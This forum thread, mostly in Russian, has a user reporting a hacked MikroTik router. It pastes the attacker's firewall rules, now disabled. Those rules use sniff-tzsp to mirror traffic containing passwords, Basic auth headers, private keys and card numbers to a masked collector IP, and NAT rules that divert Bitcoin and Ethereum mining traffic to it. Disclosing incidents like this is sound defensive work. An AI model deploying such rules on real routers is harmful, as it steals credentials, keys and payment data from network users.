Community discussions

 
makstex
newbie
Topic Author
Posts: 46
Joined: Fri Mar 27, 2009 6:31 am

Интересно через чё ломанули.

Fri Nov 09, 2018 12:28 pm

Может кому нибудь пригодиться.
Друзья меня попросили помочь с микротиком, слишком всё медленно работать стало.
Полез проверять и нарыл следующее:
1. Сменили winbox порт на 65000
2. Включили сокс и webproxy
3. Добавили несколько правил для снифинга паролей и тырения кошельков, зашёл по адресу, на который всё отправлялось - pcap все в открытом доступе, ip адрес коллектора на всякий случай закомментил.
Версия mikrotik на момент установки была последняя 6.42.7, пароль 20 символов, как ломанули посмотреть не могу, так как все логи потёрты и отключены, отключил все сервисы и доступ извне. Пока добавленные правила отключил и оставил на изучение.
...skip...
/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork disabled=yes new-connection-mark=Ethereum passthrough=yes
add action=add-dst-to-address-list address-list=Ethereum address-list-timeout=none-dynamic chain=prerouting content=eth_submitWork disabled=yes
add action=fasttrack-connection chain=prerouting content=eth_submitWork disabled=yes
add action=mark-connection chain=prerouting content=mining.submit disabled=yes new-connection-mark=Bitcoin passthrough=yes
add action=add-dst-to-address-list address-list=Bitcoin address-list-timeout=none-dynamic chain=prerouting content=mining.submit disabled=yes
add action=sniff-tzsp chain=prerouting content="ccn=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=privatekey disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=json disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="passwd=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" disabled=yes sniff-target=xx.xx.xx.xx sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin disabled=yes
/ip firewall nat
add action=dst-nat chain=dstnat disabled=yes dst-address-list=Ethereum protocol=tcp to-addresses=xx.xx.xx.xx to-ports=4444
add action=dst-nat chain=dstnat disabled=yes dst-address-list=Bitcoin protocol=tcp to-addresses=xx.xx.xx.xx to-ports=3333
...skip...
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1244
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Интересно через чё ломанули.

Fri Nov 09, 2018 1:46 pm

What would this be in English?
 
How to use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
 
makstex
newbie
Topic Author
Posts: 46
Joined: Fri Mar 27, 2009 6:31 am

Re: Интересно через чё ломанули.

Fri Nov 09, 2018 2:02 pm

Easy, google here and help:
Maybe someone will come in handy.
My friends asked me to help with a mikrotik, everything became too slow to work.
It is useful to check and find the following:
1. Change winbox port to 65000
2. Turned on socks and webproxy
3. Added a few rules for sniffing passwords and splicing wallets, went to the address to which everything was sent - pcap was all in the public domain, the ip address of the collector commented out just in case.
The mikrotik version at the time of installation was the last 6.42.7, the password of 20 characters, I could not see it, because all the logs are worn and disconnected, disabled all services and access from the outside. So far, the added rules have been disabled and left for study.
I will not insert the code, it is international)

Who is online

Users browsing this forum: Google [Bot] and 79 guests